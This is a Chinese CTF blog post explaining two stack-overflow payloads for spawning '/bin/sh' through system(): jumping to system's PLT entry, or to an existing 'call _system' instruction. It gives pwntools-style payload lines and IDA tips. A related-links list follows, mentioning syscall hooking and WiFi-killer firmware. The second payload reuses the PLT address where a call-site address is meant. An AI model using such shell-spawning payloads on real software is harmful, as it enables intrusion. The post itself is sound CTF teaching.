【PWN · 总结】call _system与system调用

最新推荐文章于 2023-09-08 21:55:10 发布
最新推荐文章于 2023-09-08 21:55:10 发布
阅读量411 收藏 5
点赞数 4
分类专栏: 【PWN · 总结】 文章标签: gadget call system ctf pwn
原文链接:https://blog.csdn.net/Morphy_Amo/article/details/121757953?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522169069841816800188572413%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=169069841816800188572413&biz_id=0&utm_med
版权

call _system 相比于直调system,可以节省栈空间哦~

前言

栈溢出漏洞但是限制溢出字符数,倒逼我们减少溢出内容。

习题:NSSCTF | 在线CTF平台

构造payload的时候有两种方式构造
第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址

system_addr = 0x08048320
binsh_addr = 0x0804a024
payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0)  + p32(binsh_addr)

第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用system的地址

system_addr = 0x08048320
binsh_addr = 0x0804a024
payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(binsh_addr)

为什么调用system的plt地址时,要比调用call system的调用地址时多构造四个字节?

首先,我们想要程序执行的是

system('/bin/sh');

合法的程序在编译这一步时,实际上执行的是

lea eax, [address_binsh_str]
push eax
call system

进一步对call指令进行分解,执行call指令相当于

push ip					;执行system_addr之后的返回地址
jmp system_addr

因此,直接调用system函数时,在system地址后面要接上一个返回地址,再接上system函数的参数

而如果调用的是call system的话,返回到call system之后,才会执行push ip的操作,这个时候的push操作不需要我们关心,因此payload直接就是call_system_addr + binsh_addr
————————————————
版权声明:本文为CSDN博主「Morphy_Amo」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/Morphy_Amo/article/details/121757953

 利用方法

左侧找到相关函数,双击。 

选中一行 _system  按x键,即交叉引用,找到程序中用到_system的其他位置

即可找到相关代码段

Mr_Fmnwon
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 12
    评论
专栏目录
2. pwn入门新手做system没有参数(内含函数调用过程),需要自己构造的攻防世界cgpwn2,求大佬指教
qiudalaojiao的博客
02-07 1922
我们拿到文件之后放到 linux里checksec一下 一个32位文件 ,开了nx 把文件拖入 ida f5开始分析 main 函数 我们看到了hello() 函数 点进去 进行分析 我们看到了比较重要的几行交互代码,,我们看看下面的部分首先要求我们输入一个名字,这个输入是通过fgets函数完成的,从键盘读取最多32h个字符到name区域 我上网百度了一下 fgets的函数原型 我们双击f...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
linux内核分析之system_call.s
缘分天空
09-15 5056
1. 系统调用处理底层程序,通过int 0x80进行系统调用2. 时钟,硬盘,软盘中断处理程序信号,子进程结束SIG_CHLD = 17定义了从系统调用返回时各个寄存器在堆栈中的偏移值(ret_from_sys_call)EAX  = 0x00EBX  = 0x04ECX  = 0x08EDX  = 0x0CFS  = 0x10ES  = 0x14DS  = 0x18EIP  = 0x
Pwn_4 Function Call
weixin_30569001的博客
02-18 66
main(){F1(arg1,arg2)…printf(); //这个printf 的地址就称为返回地址 return address}push arg2push arg1call F1在执行F1函数之前,首先要将返回地址入栈,然后进入函数。mov esp,ebppop ebpret非常关键的一张图 溢出后向下覆盖,覆盖返回地址ret addr函数执行完 EBP和ESP相等mov esp,ebp...
system_call 系统调用
weixin_30247781的博客
03-29 82
其实做一个小的系统能给人带来些许的快乐和满足感,MenuOS之前完成过,知识之间是有联系的;system_call要求系统执行相应的指令,逐步访问,根本上还是C语言的应用。 刘占鹏 《Linux内核分析》MOOC课程http://mooc.study.163.com/course/USTC-1000029000 转载于:https://www.cnblogs.com/liuzp...
linux中call命令,各种linux命令(pwn)
weixin_39932455的博客
05-02 167
(gdb)bt //查看函数堆栈(gdb)info break //查看断点信息(gdb)x 0X804962c //相当于 *0X804962c(gdb)x /20i $eip //查看接下来20条指令(gdb)p system ...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
pwn.rar_made_truckhya_对话框与窗口
09-23
How to make up your own ActiveX control? To see how this program is made using VC,
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
计算机系统:深入解析System Call
m0_72410588的博客
09-08 676
System Call是操作系统向用户空间程序提供的一组函数或接口,用于访问操作系统内核的功能和资源。通过System Call,应用程序可以请求操作系统完成诸如文件操作、内存管理、进程管理、网络通信等操作,从而实现对计算机系统的控制与利用。通过本篇博客的详细解析,我们对System Call有了更深入的了解。System Call作为计算机系统的重要组成部分,为应用程序与操作系统之间的交互提供了关键支持。无论是文件操作、进程管理还是网络通信,System Call都扮演着不可或缺的角色。
systemcall---系统调用
luotuoass
12-15 221
http://www.ibm.com/developerworks/cn/linux/l-system-calls/ 系统调用就是用户空间应用程序和内核提供的服务之间的一个接口。由于服务是在内核中提供的,因此无法执行直接调用;相反,您必须使用一个进程来跨越用户空间与内核之间的界限。在特定架构中实现此功能的方法会有所不同。因此,本文将着眼于最通用的架构 —— i386。 在本文中,我...
SystemC Functions
元直的博客
10-24 212
SystemC Functions 一、SystemC FunctionsSyntax type function_name (arguments) { function_body; } where, type – functions will return an value, type specifies the return type function_name – name of the function arguments – arguments to the functio.
[SystemC]SystemC Functions
元直的博客
04-01 262
SystemC Functions function is group of statements to perform the specific task. 一、Syntax: type function_name (arguments) { function_body; } where,...
pwn基本ROP——ret2syscall
turtlesd的博客
04-25 2809
ret2syscall环境原理系统调用利用方式漏洞分析使用`checksec`指令查看程序保护措施使用IDE32位进行调试payload 环境 ret2syscall 原理 系统调用 系统调用(英语:system call),指运行在用户空间的程序向操作系统内核请求需要更高权限运行的服务。 操作系统的进程空间可分为用户空间和内核空间,它们需要不同的执行权限。其中系统调用运行在内核空间。 应用程序调用系统调用的过程是: 1、把系统调用的编号存入 EAX; 1、把函数参数存入其它通用寄存器; 3、触发 0x80
pwn学习】pwn中直接调用system和调用call system的区别
Morphy_Amo的博客
12-06 2231
以 XCTF-pwn-新手区-004 为例, 本题在构造payload的时候有两种方式构造 第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址 system_addr = 0x08048320 binsh_addr = 0x0804a024 payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr) 第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用syste
Linux系统中获取系统调用表(system call table)地址的几种方法
weixin_42915431的博客
06-02 6869
上回讲到如何编写简单的内核模块,那么内核模块可以用来做什么呢?一个例子就是可以hook系统调用,替换为自己的接口函数;还有就是设备驱动的开发。 本文将就hook系统底层调用技术展开讨论。下图是应用层的一个系统调用在linux系统中的调用流程: 在应用层调用getpid系统调用,为glibc中封装,此调用会引发int 80中断,调用切换到内核空间,然后根据system_call数组及其_NR_getpid下标找到系统调用sys_getpid接口的地址,之后将会返回系统调用结果到应用层。 ..
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 421
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
没有system函数的pwn
最新发布
11-16
没有`system`函数的pwn指的是在pwn题目中,限制了我们不能直接使用`system`函数来执行系统命令的情况,这通常是出于安全考虑,以防止恶意用户滥用系统权限。 在这种情况下,我们需要使用一些其他的方法来达到我们的目的,常见的方法有以下几种: 1. 利用已有的函数:通过检查题目给出的已有函数列表,寻找可以执行系统命令的函数。例如,可以尝试使用`execve`函数或者`popen`函数来执行命令。 2. 利用文件IO:在某些情况下,我们可以通过读写文件来实现执行系统命令的效果。例如,我们可以通过读取特定的文件,获取系统敏感信息,或者在某些可写的文件中,写入系统命令并执行。 3. 利用已有的程序逻辑:通过分析题目中给出的已有代码,寻找可以被利用的漏洞。例如,可能存在栈溢出、格式化字符串漏洞或者任意写等,通过这些漏洞可以实现执行系统命令的效果。 4. 利用动态链接库:在某些情况下,我们可以通过加载自定义的动态链接库来执行系统命令。例如,可以使用`LD_PRELOAD`环境变量来加载我们自己编写的动态链接库,使其替换掉原有的函数,达到执行系统命令的效果。 除了以上方法,还有很多其他的技巧和方法,都需要根据具体的题目来进行分析和判断。在解决这类问题时,我们需要仔细审查题目给出的代码、函数列表和已有的漏洞,在找到合适的方法后,进行代码编写和测试。有时可能需要结合调试工具,如gdb,来进行进一步的分析和验证。最终目的是通过巧妙的代码构造,实现执行系统命令的功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值